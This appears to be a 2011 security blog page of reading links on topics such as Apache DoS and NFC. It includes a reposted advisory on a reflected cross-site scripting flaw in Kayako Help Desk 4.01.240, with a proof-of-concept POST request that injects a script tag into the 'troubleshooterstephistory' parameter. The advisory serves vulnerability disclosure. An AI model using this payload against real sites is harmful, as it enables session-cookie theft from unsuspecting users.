ISACA Journal Vol 1 2011

ISACA Journal Vol 1, 2011
Must-read articles

• A Young Professional’s Guide to Career Success Using Soft Skills
• Auditing Security Risks in Virtual IT Systems
• Simplify and Layer Your Security Approach to Protect Card Data
• JOnline: Auditing Biometrics-based Authentication Systems

Promoting Security Policies Using Organizational Culture | infosec…

• Promoting Security Policies Using Organizational Culture | infosec island

Banking Security News Bad News For Banks Courts…

Banking Security News

• Bad News For Banks: Courts Side With Customers

BackBox | Flexible Penetration Testing Distribution BackBox Linux…

BackBox | Flexible Penetration Testing Distribution
BackBox Linux 2

Using HVAC To Set Up A Hack |…

• Using HVAC To Set Up A Hack | Dark Reading

NFS Near Field Communications NFC World Can you…

NFS (Near Field Communications)

• NFC World
• Can you use a cell phone as a credit card? | HowStuffWorks

Postings with regard to Apache DoS Attack New…

Postings with regard to Apache DoS Attack

• New Open-Source Tool for Slow HTTP DoS Attack Vulnerabilities | Qualys Security Lab
• Resources for the Apache HTTP Server Denial of Service Vulnerability | Cisco Blog
• Apache DoS Bug Resurfaces, Spurring New Attacks | threatpost
• Apache exploit leaves up to 65% of all websites vulnerable | Naked Security
• Apache Killer DoS Vulnerability Patch Released | infosec Island

Kayako Help Desk Software Cross Site Scripting Vulnerability…

Kayako Help Desk Software Cross-Site Scripting Vulnerability

• Affected Version: 4.01.240
• URL: http://www.kayako.com/

Description
There is an input validation error in the Kayako, which is vulnerable to XSS.

Category lists can be created on the Troubleshooter page (by default, “General”), that is accessible to unauthenticated users.
When a user clicks a category, then the request is submitted via HTTP GET as below.

Original Request
— CUT —
GET /index.php?/Troubleshooter/Step/View/1 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://example.com/index.php?/Troubleshooter/List
Accept-Language: en-us
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: example.com
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%
22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A5%3A%22geoip%22%3Bi%3A1%3Bs%3A9%3A%
22notecheck%
22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22sessionid%22%3Bs%3A32%3A%22fy757s2ygz7sss
upwrzdutmhqw3voucz%22%3Bs%3A9%3A%22lastvisit%22%3Bi%3A1306828833%3B%7D; jqCookieJar_options=%7B%7D; SWIFT_sessionid40=fpsq1lzqbr8fenj8ou2t5o9qcm09bp1u; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=fy757s2ygz7sssupwrzdutmhqw3voucz
— CUT END —

Response
— CUT —
<input type=”hidden” name=”troubleshooterstephistory” val
ue=”0″ /><input type=”hidden” name=”isback” id=”trisback” value=”0″ />
— CUT END —

The parameter “troubleshooterstephistory” lacks input validation and is vulnerable to XSS.
To exploit this, you have to send the request via HTTP POST, not HTTP GET.

Exploit
— CUT —
POST /index.php?/Troubleshooter/Step/View/1 HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive
Cookie: SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=kvwgrm3nqrwjhmvfd6y4knn62sap6ohm; SWIFT_visitorsession=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D;

troubleshooterstephistory=”><body onload=alert(document.cookie)>&isback=0
— CUT END —

Response
— CUT —
<input type=”hidden” name=”troubleshooterstephistory” value=””><body onload=alert(document.cookie)>” /><input type=”hidden” name=”isback” id=”trisback” value=”0″ />
— CUT END —

Vendor Response
The vendor acknowledged the issue but no update yet.

Readings for the week 27 Jun 2 Jul…

Readings for the week (27 Jun – 2 Jul 2011)

• Program Managers Can Be An Organization’s Top Salespeople
• 2011 CWE/SANS Top 25 Most Dangerous Software Errors

Readings for the week 20 Jun 25 Jun…

Readings for the week (20 Jun – 25 Jun 2011)

• 101 awesome marketing quotes; A presentation
• Hackers: Are They All Villains?